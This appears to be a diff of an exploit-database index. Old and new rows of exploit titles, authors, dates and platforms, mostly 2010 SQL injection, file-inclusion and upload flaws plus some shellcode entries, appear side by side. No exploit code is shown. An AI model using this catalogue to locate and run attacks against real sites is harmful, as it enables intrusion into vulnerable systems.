12792,platforms/php/webapps/12792.txt,"MileHigh Creative - (SQL Injection / Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0
12793,platforms/php/webapps/12793.txt,"Cosmos Solutions CMS - SQL Injection",2010-05-29,cyberlog,php,webapps,0
12794,platforms/php/webapps/12794.txt,"Cosmos Solutions CMS - (id= / page=) SQL Injection",2010-05-29,gendenk,php,webapps,0
12796,platforms/php/webapps/12796.txt,"Joomla! Component BF Quiz - SQL Injection (2)",2010-05-29,"Valentin Hoebel",php,webapps,0
12796,platforms/php/webapps/12796.txt,"Joomla! Component 'com_bfquiztrial' - SQL Injection (2)",2010-05-29,"Valentin Hoebel",php,webapps,0
12797,platforms/php/webapps/12797.txt,"Webiz 2004 - Local File Upload",2010-05-29,kannibal615,php,webapps,0
12798,platforms/php/webapps/12798.txt,"Webiz - SQL Injection",2010-05-29,kannibal615,php,webapps,0
12801,platforms/php/webapps/12801.txt,"osCommerce Online Merchant 2.2 - File Disclosure / Authentication Bypass",2010-05-30,Flyff666,php,webapps,0
@ -11689,9 +11689,9 @@ id,file,description,date,author,platform,type,port
12808,platforms/php/webapps/12808.txt,"PTC Site's - Remote Code Execution / Cross-Site Scripting",2010-05-30,CrazyMember,php,webapps,0
12809,platforms/php/webapps/12809.txt,"Symphony CMS - Local File Inclusion",2010-05-30,AntiSecurity,php,webapps,0
12811,platforms/php/webapps/12811.txt,"osCommerce Online Merchant 2.2 - Arbitrary File Upload",2010-05-30,MasterGipy,php,webapps,0
12812,platforms/php/webapps/12812.txt,"Joomla! Component com_quran - SQL Injection",2010-05-30,r3m1ck,php,webapps,0
12812,platforms/php/webapps/12812.txt,"Joomla! Component 'com_quran' - SQL Injection",2010-05-30,r3m1ck,php,webapps,0
12813,platforms/php/webapps/12813.txt,"WsCMS - Multiple SQL Injections",2010-05-31,cyberlog,php,webapps,0
12814,platforms/php/webapps/12814.txt,"Joomla! Component com_g2bridge - Local File Inclusion",2010-05-31,akatsuchi,php,webapps,0
12814,platforms/php/webapps/12814.txt,"Joomla! Component 'com_g2bridge' - Local File Inclusion",2010-05-31,akatsuchi,php,webapps,0
12815,platforms/windows/remote/12815.txt,"GoAheaad WebServer - Source Code Disclosure",2010-05-30,Sil3nt_Dre4m,windows,remote,0
12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 - '.zar' Denial of Service",2010-05-31,TecR0c,windows,dos,0
12817,platforms/php/webapps/12817.txt,"QuickTalk 1.2 - (Source Code Disclosure) Multiple Vulnerabilities",2010-05-31,indoushka,php,webapps,0
@ -11699,15 +11699,15 @@ id,file,description,date,author,platform,type,port
12819,platforms/php/webapps/12819.txt,"Persian E107 - Cross-Site Scripting",2010-05-31,indoushka,php,webapps,0
12820,platforms/php/webapps/12820.txt,"Visitor Logger - 'banned.php' Remote File Inclusion",2010-05-31,bd0rk,php,webapps,0
12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - SEH Exploit",2010-05-31,Stoke,windows,local,0
12822,platforms/php/webapps/12822.txt,"Joomla! Component com_jsjobs - SQL Injection",2010-05-31,d0lc3,php,webapps,0
12822,platforms/php/webapps/12822.txt,"Joomla! Component 'com_jsjobs' - SQL Injection",2010-05-31,d0lc3,php,webapps,0
12823,platforms/php/webapps/12823.txt,"MusicBox - SQL Injection",2010-05-31,titanichacker,php,webapps,0
12833,platforms/asp/webapps/12833.txt,"Patient folder (THEME ASP) - SQL Injection",2010-05-31,"SA H4x0r",asp,webapps,0
12834,platforms/windows/remote/12834.py,"XFTP 3.0 Build 0239 - Long Filename Buffer Overflow",2010-06-01,sinn3r,windows,remote,0
12839,platforms/php/webapps/12839.txt,"Hexjector 1.0.7.2 - Persistent Cross-Site Scripting",2010-06-01,hexon,php,webapps,0
12840,platforms/php/webapps/12840.txt,"Delivering Digital Media CMS - SQL Injection",2010-06-01,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
12841,platforms/asp/webapps/12841.txt,"Ticimax E-Ticaret - SQL Injection",2010-06-01,Neuromancer,asp,webapps,0
12842,platforms/php/webapps/12842.txt,"Joomla! Component ChronoConnectivity (com_chronoconnectivity) - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
12843,platforms/php/webapps/12843.txt,"Joomla! Component ChronoForms (com_chronocontact) - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
12842,platforms/php/webapps/12842.txt,"Joomla! Component 'com_chronoconnectivity' - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
12843,platforms/php/webapps/12843.txt,"Joomla! Component 'com_chronocontact' - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
12845,platforms/php/webapps/12845.txt,"Vastal I-Tech - SQL Injection",2010-06-02,HELLBOY,php,webapps,0
12848,platforms/php/webapps/12848.txt,"SIMM Management System (SMS) - Local File Inclusion",2010-06-02,AntiSecurity,php,webapps,0
12849,platforms/php/webapps/12849.txt,"slogan design Script - SQL Injection",2010-06-03,Mr.P3rfekT,php,webapps,0
@ -11723,7 +11723,7 @@ id,file,description,date,author,platform,type,port
12865,platforms/hardware/remote/12865.txt,"Motorola Surfboard Cable Modem - Directory Traversal",2010-06-03,"S2 Crew",hardware,remote,0
12866,platforms/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,php,webapps,0
12867,platforms/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,php,webapps,0
12868,platforms/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,php,webapps,0
12868,platforms/php/webapps/12868.txt,"Joomla! Component 'com_lead' - SQL Injection",2010-06-03,ByEge,php,webapps,0
40335,platforms/windows/local/40335.txt,"ArcServe UDP 6.0.3792 Update 2 Build 516 - Unquoted Service Path Privilege Escalation",2016-09-05,sh4d0wman,windows,local,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -12107,7 +12107,7 @@ id,file,description,date,author,platform,type,port
13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0
13735,platforms/osx/remote/13735.py,"Apple Mac OSX EvoCam Web Server 3.6.6 / 3.6.7 - Buffer Overflow",2010-06-05,d1dn0t,osx,remote,8080
13736,platforms/php/webapps/13736.txt,"DDLCMS 2.1 - (skin) Remote File Inclusion",2010-06-06,eidelweiss,php,webapps,0
13737,platforms/php/webapps/13737.txt,"Joomla! Component com_djartgallery - Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0
13737,platforms/php/webapps/13737.txt,"Joomla! Component 'com_djartgallery' - Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0
13738,platforms/php/webapps/13738.txt,"PHP Director 0.2 - SQL Injection",2010-06-06,Mr.Rat,php,webapps,0
13739,platforms/php/webapps/13739.txt,"WmsCMS - Cross-Site Scripting / SQL Injection",2010-06-06,Ariko-Security,php,webapps,0
13740,platforms/php/webapps/13740.txt,"iScripts eSwap 2.0 - SQL Injection / Cross-Site Scripting",2010-06-06,Sid3^effects,php,webapps,0
@ -12118,9 +12118,9 @@ id,file,description,date,author,platform,type,port
15499,platforms/windows/local/15499.py,"Free WMA MP3 Converter 1.1 - Buffer Overflow (SEH)",2010-11-12,Dr_IDE,windows,local,0
13744,platforms/php/webapps/13744.txt,"RTRandomImage - Remote File Inclusion",2010-06-06,"Sn!pEr.S!Te Hacker",php,webapps,0
13745,platforms/php/webapps/13745.txt,"Sphider Script - Remote Code Execution",2010-06-06,XroGuE,php,webapps,0
13746,platforms/php/webapps/13746.txt,"Joomla! Component com_searchlog - SQL Injection",2010-06-06,d0lc3,php,webapps,0
13746,platforms/php/webapps/13746.txt,"Joomla! Component 'com_searchlog' - SQL Injection",2010-06-06,d0lc3,php,webapps,0
13747,platforms/php/webapps/13747.txt,"PHP Car Rental Complete System 1.2 - SQL Injection",2010-06-06,Sid3^effects,php,webapps,0
13748,platforms/php/webapps/13748.txt,"Joomla! Component com_annonces - Arbitrary File Upload",2010-06-06,Sid3^effects,php,webapps,0
13748,platforms/php/webapps/13748.txt,"Joomla! Component 'com_annonces' - Arbitrary File Upload",2010-06-06,Sid3^effects,php,webapps,0
13749,platforms/php/webapps/13749.txt,"idevspot Text ads 2.08 - SQL Injection",2010-06-06,Sid3^effects,php,webapps,0
13750,platforms/php/webapps/13750.txt,"WebBiblio Subject Gateway System - Local File Inclusion",2010-06-06,AntiSecurity,php,webapps,0
13751,platforms/php/webapps/13751.txt,"greeting card - Arbitrary File Upload",2010-06-06,Mr.Benladen,php,webapps,0
@ -12158,21 +12158,21 @@ id,file,description,date,author,platform,type,port
13790,platforms/asp/webapps/13790.txt,"iClone - SQL Injection",2010-06-09,Sid3^effects,asp,webapps,0
14333,platforms/php/webapps/14333.html,"Orbis CMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - netcat connect back port 8080 Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0
13792,platforms/php/webapps/13792.txt,"Joomla! Component cinema - SQL Injection",2010-06-09,Sudden_death,php,webapps,0
13792,platforms/php/webapps/13792.txt,"Joomla! Component 'com_cinema' - SQL Injection",2010-06-09,Sudden_death,php,webapps,0
13793,platforms/asp/webapps/13793.txt,"Online Notebook Manager - SQL Injection",2010-06-09,"L0rd CrusAd3r",asp,webapps,0
13794,platforms/multiple/webapps/13794.txt,"Joomla! Component Jreservation 1.5 - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,multiple,webapps,0
13794,platforms/multiple/webapps/13794.txt,"Joomla! Component 'Jreservation' 1.5 - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,multiple,webapps,0
27972,platforms/php/webapps/27972.txt,"ESTsoft InternetDisk - Arbitrary File Upload / Script Execution",2006-06-05,Kil13r,php,webapps,0
27973,platforms/php/webapps/27973.txt,"Bookmark4U 2.0 - inc/dbase.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0
27974,platforms/php/webapps/27974.txt,"Bookmark4U 2.0 - inc/config.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0
13796,platforms/php/webapps/13796.txt,"Joomla! Component com_jstore - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13797,platforms/php/webapps/13797.txt,"Joomla! Component com_jtickets - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13798,platforms/php/webapps/13798.txt,"Joomla! Component com_jcommunity - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13799,platforms/php/webapps/13799.txt,"Joomla! Component com_jmarket - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13800,platforms/php/webapps/13800.txt,"Joomla! Component com_jsubscription - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13796,platforms/php/webapps/13796.txt,"Joomla! Component 'com_jstore' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13797,platforms/php/webapps/13797.txt,"Joomla! Component 'com_jtickets' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13798,platforms/php/webapps/13798.txt,"Joomla! Component 'com_jcommunity' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13799,platforms/php/webapps/13799.txt,"Joomla! Component 'com_jmarket' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13800,platforms/php/webapps/13800.txt,"Joomla! Component 'com_jsubscription' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13801,platforms/php/webapps/13801.txt,"Science Fair In A Box - SQL Injection / Cross-Site Scripting",2010-06-09,"L0rd CrusAd3r",php,webapps,0
13802,platforms/php/webapps/13802.txt,"PHP Real Estate Script - SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0
13803,platforms/php/webapps/13803.txt,"PHPAccess - SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0
13804,platforms/php/webapps/13804.txt,"Joomla! Component com_jnewsletter - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13804,platforms/php/webapps/13804.txt,"Joomla! Component 'com_jnewsletter' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13805,platforms/php/webapps/13805.txt,"PHP Property Rental Script - SQL Injection / Cross-Site Scripting",2010-06-09,"L0rd CrusAd3r",php,webapps,0
13806,platforms/windows/local/13806.txt,"ActivePerl 5.8.8.817 - Buffer Overflow",2010-06-09,PoisonCode,windows,local,0
13807,platforms/php/webapps/13807.py,"BtiTracker 1.3.x < 1.4.x - Exploit",2010-06-09,TinKode,php,webapps,0
@ -12274,10 +12274,10 @@ id,file,description,date,author,platform,type,port
13919,platforms/windows/dos/13919.c,"Corel VideoStudio Pro X3 - '.mp4' Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0
13920,platforms/windows/dos/13920.c,"H264WebCam - Boundary Condition Error",2010-06-18,"fl0 fl0w",windows,dos,0
13921,platforms/windows/dos/13921.c,"PowerZip 7.21 (Build 4010) - Stack Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0
13922,platforms/php/webapps/13922.txt,"Joomla! Component com_joomdocs - Cross-Site Scripting",2010-06-18,Sid3^effects,php,webapps,0
13923,platforms/php/webapps/13923.txt,"Joomla! Component Answers 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
13925,platforms/php/webapps/13925.txt,"Joomla! Component ozio Gallery 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
13926,platforms/php/webapps/13926.txt,"Joomla! Component listbingo 1.3 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
13922,platforms/php/webapps/13922.txt,"Joomla! Component 'com_joomdocs' - Cross-Site Scripting",2010-06-18,Sid3^effects,php,webapps,0
13923,platforms/php/webapps/13923.txt,"Joomla! Component 'com_answers' 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
13925,platforms/php/webapps/13925.txt,"Joomla! Component 'com_oziogallery' 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
13926,platforms/php/webapps/13926.txt,"Joomla! Component 'com_listbingo' 1.3 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
13927,platforms/php/webapps/13927.txt,"MarketSaz - Arbitrary File Upload",2010-06-18,NetQurd,php,webapps,0
13929,platforms/php/webapps/13929.txt,"Banner Management Script - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
13930,platforms/php/webapps/13930.txt,"Shopping Cart Script with Affiliate Program - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
@ -12285,7 +12285,7 @@ id,file,description,date,author,platform,type,port
13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0
13933,platforms/php/webapps/13933.txt,"UK One Media CMS - 'id' Error-Based SQL Injection",2010-06-19,LiquidWorm,php,webapps,0
13934,platforms/windows/dos/13934.py,"MoreAmp - '.maf' Buffer Overflow (PoC)",2010-06-19,Sid3^effects,windows,dos,0
13935,platforms/php/webapps/13935.txt,"Joomla! Component RSComments 1.0.0 - Persistent Cross-Site Scripting",2010-06-19,jdc,php,webapps,0
13935,platforms/php/webapps/13935.txt,"Joomla! Component 'RSComments' 1.0.0 - Persistent Cross-Site Scripting",2010-06-19,jdc,php,webapps,0
13936,platforms/php/webapps/13936.txt,"Elite Gaming Ladders 3.5 - SQL Injection (ladder[id])",2010-06-19,ahwak2000,php,webapps,0
13937,platforms/php/webapps/13937.txt,"SnowCade 3.0 - SQL Injection",2010-06-19,ahwak2000,php,webapps,0
13938,platforms/php/webapps/13938.html,"WebsiteBaker 2.8.1 - Cross-Site Request Forgery (PoC)",2010-06-19,"Luis Santana",php,webapps,0
@ -12300,11 +12300,11 @@ id,file,description,date,author,platform,type,port
13947,platforms/php/webapps/13947.txt,"PHP Calendars Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0
13948,platforms/php/webapps/13948.txt,"OroHYIP - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0
13949,platforms/php/webapps/13949.txt,"Shareasale Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0
13951,platforms/php/webapps/13951.txt,"Joomla! Component com_eportfolio - Arbitrary File Upload",2010-06-20,Sid3^effects,php,webapps,0
13951,platforms/php/webapps/13951.txt,"Joomla! Component 'com_eportfolio' - Arbitrary File Upload",2010-06-20,Sid3^effects,php,webapps,0
13952,platforms/php/webapps/13952.txt,"Saffa Tunes CMS - 'news.php' SQL Injection",2010-06-21,"Th3 RDX",php,webapps,0
13954,platforms/php/webapps/13954.txt,"G.CMS Generator - SQL Injection",2010-06-21,Sid3^effects,php,webapps,0
13955,platforms/php/webapps/13955.txt,"Joomla! Component Template BizWeb com_community - Persistent Cross-Site Scripting",2010-06-21,Sid3^effects,php,webapps,0
13956,platforms/php/webapps/13956.txt,"Joomla! Component Hot Property com_jomestate - Remote File Inclusion",2010-06-21,Sid3^effects,php,webapps,0
13955,platforms/php/webapps/13955.txt,"Joomla! Component 'com_community' - Persistent Cross-Site Scripting",2010-06-21,Sid3^effects,php,webapps,0
13956,platforms/php/webapps/13956.txt,"Joomla! Component 'com_jomestate' - Remote File Inclusion",2010-06-21,Sid3^effects,php,webapps,0
13957,platforms/php/webapps/13957.txt,"myUPB 2.2.6 - Multiple Vulnerabilities",2010-06-21,"ALTBTA ",php,webapps,0
13958,platforms/windows/dos/13958.txt,"Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities",2010-06-21,leinakesi,windows,dos,0
13959,platforms/windows/dos/13959.c,"TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987
@ -12313,7 +12313,7 @@ id,file,description,date,author,platform,type,port
14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution",2010-07-14,"Meder Kydyraliev",multiple,remote,0
13960,platforms/php/webapps/13960.html,"PHPWCMS 1.4.5 r398 - Cross-Site Request Forgery",2010-06-21,"Jeremiah Talamantes",php,webapps,0
13961,platforms/php/webapps/13961.txt,"Alpin CMS 1.0 - SQL Injection",2010-06-21,"Th3 RDX",php,webapps,0
13962,platforms/php/webapps/13962.txt,"Joomla! Component JomSocial 1.6.288 - Multiple Cross-Site Scripting",2010-06-21,jdc,php,webapps,0
13962,platforms/php/webapps/13962.txt,"Joomla! Component 'JomSocial' 1.6.288 - Multiple Cross-Site Scripting",2010-06-21,jdc,php,webapps,0
13964,platforms/php/webapps/13964.txt,"Linker IMG 1.0 - Remote File Inclusion",2010-06-21,"Sn!pEr.S!Te Hacker",php,webapps,0
13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - SEH (PoC)",2010-06-22,blake,windows,dos,0
13966,platforms/php/webapps/13966.txt,"The Uploader 2.0.4 - Remote File Disclosure",2010-06-22,Xa7m3d,php,webapps,0
@ -12326,9 +12326,9 @@ id,file,description,date,author,platform,type,port
13976,platforms/php/webapps/13976.txt,"Top Sites Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0
13977,platforms/php/webapps/13977.txt,"Social Community Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0
13978,platforms/php/webapps/13978.txt,"Job Search Engine Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0
13979,platforms/php/webapps/13979.txt,"Joomla! Component com_ybggal 1.0 - 'catid' SQL Injection",2010-06-22,v3n0m,php,webapps,0
13979,platforms/php/webapps/13979.txt,"Joomla! Component 'com_ybggal' 1.0 - 'catid' Parameter SQL Injection",2010-06-22,v3n0m,php,webapps,0
13980,platforms/php/webapps/13980.txt,"Cornerstone CMS - SQL Injection",2010-06-22,"Th3 RDX",php,webapps,0
13981,platforms/php/webapps/13981.txt,"Joomla! Component Picasa2Gallery - Local File Inclusion",2010-06-22,kaMtiEz,php,webapps,0
13981,platforms/php/webapps/13981.txt,"Joomla! Component 'com_picasa2gallery' - Local File Inclusion",2010-06-22,kaMtiEz,php,webapps,0
13982,platforms/php/webapps/13982.txt,"Alpin CMS - 'e4700.asp?id' SQL Injection",2010-06-22,CoBRa_21,php,webapps,0
13983,platforms/php/webapps/13983.txt,"Greeting card 1.1 - SQL Injection",2010-06-22,Net.Edit0r,php,webapps,0
13986,platforms/php/webapps/13986.txt,"Softbiz Resource Repository Script - Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps,0
@ -12341,7 +12341,7 @@ id,file,description,date,author,platform,type,port
14512,platforms/php/webapps/14512.txt,"Concept E-Commerce - SQL Injection",2010-07-31,gendenk,php,webapps,0
13995,platforms/asp/webapps/13995.txt,"Boat Classifieds - 'printdetail.asp?Id' SQL Injection",2010-06-23,CoBRa_21,asp,webapps,0
13996,platforms/php/webapps/13996.txt,"Pre Multiple Vendors Shopping Malls - 'products.php?sid' SQL Injection",2010-06-23,CoBRa_21,php,webapps,0
13997,platforms/php/webapps/13997.txt,"Joomla! Component JE Ajax Event Calendar - SQL Injection",2010-06-23,"L0rd CrusAd3r",php,webapps,0
13997,platforms/php/webapps/13997.txt,"Joomla! Component 'jeeventcalendar' - SQL Injection",2010-06-23,"L0rd CrusAd3r",php,webapps,0
13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' SEH Universal Buffer Overflow",2010-06-23,Madjix,windows,local,0
13999,platforms/php/webapps/13999.html,"Software Index - Arbitrary File Upload",2010-06-23,indoushka,php,webapps,0
14000,platforms/php/webapps/14000.txt,"PishBini Footbal - Cross-Site Scripting / SQL Injection",2010-06-23,indoushka,php,webapps,0
@ -12360,7 +12360,7 @@ id,file,description,date,author,platform,type,port
14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 SPA - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0
14015,platforms/php/webapps/14015.txt,"2DayBiz Photo Sharing Script - SQL Injection (1)",2010-06-24,JaMbA,php,webapps,0
14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta - 'init.php' Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0
14017,platforms/php/webapps/14017.txt,"Joomla! Component com_realtyna - Local File Inclusion",2010-06-24,MISTERFRIBO,php,webapps,0
14017,platforms/php/webapps/14017.txt,"Joomla! Component 'com_realtyna' - Local File Inclusion",2010-06-24,MISTERFRIBO,php,webapps,0
14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community Portal - 'user-profile.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0
14019,platforms/php/webapps/14019.txt,"2DayBiz Real Estate Portal - 'viewpropertydetails.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0
14020,platforms/php/webapps/14020.txt,"2DayBiz The Web Template Software - SQL Injection / Cross-Site Scripting",2010-06-24,Sangteamtham,php,webapps,0
@ -12384,19 +12384,19 @@ id,file,description,date,author,platform,type,port
14051,platforms/php/webapps/14051.txt,"2DayBiz B2B Portal Script - 'selling_buy_leads1.php' SQL Injection",2010-06-25,r45c4l,php,webapps,0
14052,platforms/windows/shellcode/14052.c,"Windows - WinExec cmd.exe + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,windows,shellcode,0
14053,platforms/php/webapps/14053.txt,"snipe Gallery Script - SQL Injection",2010-06-25,"dev!l ghost",php,webapps,0
14054,platforms/php/webapps/14054.txt,"Joomla! Component JE Story Submit - SQL Injection",2010-06-25,"L0rd CrusAd3r",php,webapps,0
14055,platforms/php/webapps/14055.txt,"Joomla! Component com_sef - Remote File Inclusion",2010-06-26,Li0n-PaL,php,webapps,0
14054,platforms/php/webapps/14054.txt,"Joomla! Component 'jesubmit' - SQL Injection",2010-06-25,"L0rd CrusAd3r",php,webapps,0
14055,platforms/php/webapps/14055.txt,"Joomla! Component 'com_sef' - Remote File Inclusion",2010-06-26,Li0n-PaL,php,webapps,0
14056,platforms/php/webapps/14056.txt,"Clicker CMS - Blind SQL Injection",2010-06-26,hacker@sr.gov.yu,php,webapps,0
14057,platforms/php/webapps/14057.txt,"WordPress Plugin Cimy Counter - Exploit",2010-06-26,sebug,php,webapps,0
14058,platforms/aix/webapps/14058.html,"PHP-Nuke 8.2 - Arbitrary File Upload Exploit",2010-06-26,Net.Edit0r,aix,webapps,0
14059,platforms/php/webapps/14059.txt,"Joomla! Component JE Awd Song - Persistent Cross-Site Scripting",2010-06-26,Sid3^effects,php,webapps,0
14060,platforms/php/webapps/14060.txt,"Joomla! Component JE Media Player - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
14059,platforms/php/webapps/14059.txt,"Joomla! Component 'com_awd_song' - Persistent Cross-Site Scripting",2010-06-26,Sid3^effects,php,webapps,0
14060,platforms/php/webapps/14060.txt,"Joomla! Component 'JE Media Player' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
14085,platforms/php/webapps/14085.txt,"iNet Online Community - Blind SQL Injection",2010-06-28,JaMbA,php,webapps,0
14266,platforms/windows/dos/14266.pl,"IrcDelphi Daemon Server - Denial of Service",2010-07-08,Crash,windows,dos,6667
14086,platforms/php/webapps/14086.txt,"PTCPay GEN4 - 'buyupg.php' SQL Injection",2010-06-28,Dark.Man,php,webapps,0
14062,platforms/php/webapps/14062.txt,"Joomla! Component JE Event Calendar - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
14063,platforms/php/webapps/14063.txt,"Joomla! Component JE Job com_jejob - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
14064,platforms/php/webapps/14064.txt,"Joomla! Component JE Section Finder - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
14062,platforms/php/webapps/14062.txt,"Joomla! Component 'jeeventcalendar' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
14063,platforms/php/webapps/14063.txt,"Joomla! Component 'com_jejob' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
14064,platforms/php/webapps/14064.txt,"Joomla! Component 'jesectionfinder' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
14068,platforms/windows/local/14068.py,"Winamp 5.572 - Local Buffer Overflow (Windows 7 ASLR + DEP Bypass)",2010-06-26,Node,windows,local,0
14073,platforms/php/webapps/14073.txt,"2DayBiz Matrimonial Script - smartresult.php SQL Injection",2010-06-27,"Easy Laster",php,webapps,0
14070,platforms/php/webapps/14070.txt,"Speedy 1.0 - Arbitrary File Upload",2010-06-26,"ViRuS Qalaa",php,webapps,0
@ -12443,8 +12443,8 @@ id,file,description,date,author,platform,type,port
14123,platforms/php/webapps/14123.txt,"WebDM CMS - SQL Injection",2010-06-29,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
14124,platforms/php/webapps/14124.pl,"PHP-Nuke 8.0 - SQL Injection",2010-06-30,Dante90,php,webapps,0
14125,platforms/php/webapps/14125.pl,"ShopCartDx 4.30 - (products.php) Blind SQL Injection",2010-06-30,Dante90,php,webapps,0
14126,platforms/php/webapps/14126.txt,"Joomla! Component gamesbox com_gamesbox 1.0.2 - 'id' SQL Injection",2010-06-30,v3n0m,php,webapps,0
14127,platforms/php/webapps/14127.txt,"Joomla! Component Joomanager - SQL Injection",2010-06-30,Sid3^effects,php,webapps,0
14126,platforms/php/webapps/14126.txt,"Joomla! Component 'com_gamesbox' 1.0.2 - 'id' SQL Injection",2010-06-30,v3n0m,php,webapps,0
14127,platforms/php/webapps/14127.txt,"Joomla! Component 'Joomanager' - SQL Injection",2010-06-30,Sid3^effects,php,webapps,0
14141,platforms/php/webapps/14141.pl,"Oxygen2PHP 1.1.3 - (member.php) SQL Injection",2010-06-30,Dante90,php,webapps,0
14132,platforms/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",php,webapps,0
14139,platforms/arm/shellcode/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",arm,shellcode,0
@ -12457,9 +12457,9 @@ id,file,description,date,author,platform,type,port
14151,platforms/php/webapps/14151.pl,"Oxygen2PHP 1.1.3 - (post.php) Blind SQL Injection",2010-07-01,Dante90,php,webapps,0
14152,platforms/php/webapps/14152.pl,"Oxygen2PHP 1.1.3 - (forumdisplay.php) Blind SQL Injection",2010-07-01,Dante90,php,webapps,0
14153,platforms/windows/local/14153.pl,"Mediacoder 0.7.3.4682 - Universal Buffer Overflow (SEH)",2010-07-01,Madjix,windows,local,0
14154,platforms/php/webapps/14154.txt,"Joomla! Component com_dateconverter 0.1 - SQL Injection",2010-07-01,RoAd_KiLlEr,php,webapps,0
14154,platforms/php/webapps/14154.txt,"Joomla! Component 'com_dateconverter' 0.1 - SQL Injection",2010-07-01,RoAd_KiLlEr,php,webapps,0
14155,platforms/asp/webapps/14155.txt,"SIDA University System - SQL Injection",2010-07-01,K053,asp,webapps,0
14209,platforms/php/webapps/14209.txt,"Joomla! Component Front-End Article Manager System - Arbitrary File Upload",2010-07-04,Sid3^effects,php,webapps,0
14209,platforms/php/webapps/14209.txt,"Joomla! Component 'Front-End Article Manager System' - Arbitrary File Upload",2010-07-04,Sid3^effects,php,webapps,0
